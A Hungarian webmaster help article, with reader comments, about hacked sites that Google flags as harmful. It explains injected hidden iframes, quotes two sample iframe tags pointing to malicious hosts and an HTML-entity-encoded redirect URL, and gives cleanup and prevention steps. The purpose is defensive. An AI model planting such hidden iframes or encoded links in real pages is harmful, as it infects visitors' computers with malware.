Személyes eszközök
Ön itt áll: Főoldal Keresőoptimalizálás Spammerek és hackerek Feltört webhelyek és a Google

Feltört webhelyek és a Google

Manapság gyakran "törnek fel" úgy weboldalakat, hogy tulajdonosuk számára sokáig észrevétlen marad. Az oldalgazdák sokszor csak akkor értesülnek minderről, ha a Google kereső "Az oldal káros lehet számítógéped számára" figyelmeztetést, vagy böngészőjük "Bejelentett támadó webhely" figyelmeztetést jelenít meg.

A Google számára adatot gyűjtő keresőrobotok a weboldalak tetemes hányadát bejárják, letöltik és elemzik, eközben vizsgálják a weblapok tartalmát, hogy nem próbálnak-e észrevétlenül valamilyen ismert, káros fájlt letöltetni a látogatókkal.

Ha netalán ilyen weblapot találnak webhelyünkön, akkor két problémánk lesz: oldalunk a Google keresőben pusztán korlátozottan, a modern böngészőkben pedig egyáltalán nem fog megjelenni:

Mindez természetesen látogatottságunk csökkenésével fog járni, tehát ha a látogatottsági statisztikánkban hirtelen zuhanást érzékelünk, akkor érdemes megvizsgálni, hogy nem "fertőzött"-e webhelyünk.

Technikai megvalósítás

Weboldalunkat feltörő illetéktelenek nem tesznek egyebet, minthogy beszúrnak a meglévő weblapok kódjába egy olyan linket, egyébként a látogatók számára láthatatlan, mely által az összes látogató, aki megtekinti a weboldalt, letölt egy olyan programot, mely kárt okozhat számítógépében.

Legtöbbször egy iframe elemet szúrnak bele a weboldal kódjába, amit többféleképpen próbálhatnak láthatatlanná tenni, vagy a width és height paraméterek 1-re vagy 0-ra vételével, vagy pedig valamilyen CSS paraméterrel, mint pl. style="visibility:hidden", style="display:none".

<iframe src="http://b1a.ru:8080/index.php" width=142 height=172 style="visibility: hidden"></iframe>
<IFRAME SRC="http://shopmovielife.cn:8080/index.php" STYLE="visibility: hidden;" HEIGHT="189" WIDTH="147"></iframe>

A hivatkozott URL-t kódolhatják akár URL encoding segítségével, akár pedig hexadecimális számokkal meghatározott HTML entitás felhasználásával például a következőhöz hasonló kóddal, amit pedig egy JavaScript segítségével feloldanak. (ami egyébként helytelen, mert nincsenek pontosvesszők az entitások végén):

  &#104&#116&#116&#112&#58&#47&#47&#114&#97&#122&#111&#114&#115&#116&#117&#100&#105&#111&#46&#111&#114&#103&#47&#97&#100&#118&#116&#100&#115&#47&#111&#117&#116&#46&#112&#104&#112&#63&#115&#95&#105&#100&#61&#49

mindez a legtöbb böngészőben az alábbi módon jelenik meg:

  http://razorstudio.org/advtds/out.php?s_id=1

Mi a teendő?

  1. keressük meg és távolítsuk el a kérdéses kódot a weblapokról
  2. előzzük meg az oldal "újrafertőződését"
  3. jelentsük be az oldal megtisztítását a Google Webmaster Tools oldalon. 

Káros kód megkeresése

  • A weblapok kódjában legtöbbször a <body> elem után vagy a </body> elem előtt közvetlenül fordul elő a hackerek által beszúrt kód.
  • Ha ott nem látnánk gyanús elemeket, akkor abból kell kiindulni, hogy a weblapunk letöltésekor egy másik szerverről töltetnének le velünk egy fájlt, ez pedig csakis úgy lehet, hogy valahol szerepel a másik, "fertőzést terjesztő" szerver címe, amiben pedig biztos benne lesz a http:// karakterlánc.
  • Ha a weblap kódjában a http:// -re keresve semmi gyanúsat nem észlelünk, akkor keressünk rá a javascript kifejezésre, és kutassunk a fent leírt gyanús kódolások után.

Az "újrafertőződés" megelőzése

Elméletben a webtárhelyünkhöz vagy a szerver feltörésével, vagy pedig az általunk használt számítógép és programok biztonsági hibáit kiaknázva férhetnek hozzá webhelyünkhöz. Ennek megfelelően cselekedjünk, hogy ez többé ne fordulhasson elő:

  1. változtassuk meg a hozzáférés jelszavait
  2. ha saját a szerver, akkor frissítsük a szerveren használt programokat
  3. ha bérelt tárhelyünk van, akkor értesítsük a tárhely üzemeltetőjét
  4. futtassunk vírusellenőrzést az általunk használt gépen

Az oldal megtisztításának bejelentése

Miután regisztráltunk a Google Webmestereszközök szolgáltatására és felvettük ellenőrzött webhelyünkként a problémás oldalt, kérjük a webhely újrafelvételét itt: https://www.google.com/webmasters/tools/reconsideration?hl=hu

Ha eddig még nem regisztráltunk a Webmaster Tools-ra, akkor érdemes megfontolni a regisztrációt a gyorsabb ügyintézés reményében. Ha mégsem szeretnénk regisztrálni, akkor kérhetjük az oldal felülvizsgálatát a http://stopbadware.org/home/review címen is.

Mennyi idő telik el, míg újra "tisztának" minősül az oldal?

Általában pár órától pár hétig terjedő időszak alatt kerül le a weboldal a bejelentett támadó webhelyek listájáról. Ha mégsem történik ezidő alatt változás, akkor

  • Ellenőrizzük újra, hogy tényleg minden weblapról eltávolítottuk-e a kérdéses ártalmas kódot
  • Végezzünk linképítést, hiszen ez a késedelmet lehet, hogy az okozza, hogy weboldalunk kevéssé tűnik fontosnak a keresők számára, és ezért csak nagy ritkán látogatják meg a keresőrobotok, így nem szereznek tudomást a változásokról.

További olvasnivaló

 

Dokumentummal kapcsolatos tevékenységek

Saját tapasztalat

Posted by Hozzászóló at 2009. július 15., 13:30
A cikk végén a "pár naptól"-t javaslom (saját kedvező tapasztalatra alapozva) módosítani "pár órától"-ra.

Re:Saját tapasztalat

Posted by Jároli József at 2009. július 15., 13:55
Szuper, köszi, tapasztalatodnak megfelelően átírtam az oldalt.

meg egy tapasztalat

Posted by allcommenter at 2009. szeptember 16., 01:31
Nekem csak a Windows ujratelepitese segitett,barmit is csinaltam az itt felsoroltak kozul...Ha jol tudom, az iframe hacket egy cgi script koveti el, ami betelepszik a win sys-be es sokszor hiaba valtoztatjuk meg a passt es usert, a cgi script azt mindig ellopja es ujra szabad az utja az ftp-n keresztul. Barmit is csinaltam, ket ora mulva ujra ott volt. Megprobaltam az avastot, avg-t nod 32-ot es egyik se talalt semmit...aztan a win reinstall segitett.

Megelőzés

Posted by Bazsy at 2010. május 02., 20:11
Ha Total Commandert használunk, megadhatunk a szerverekhez mesterjelszót is, így minden csatlakozáskor bekéri a megadott jelszót. Sokkal biztonságosabb, én is így használom.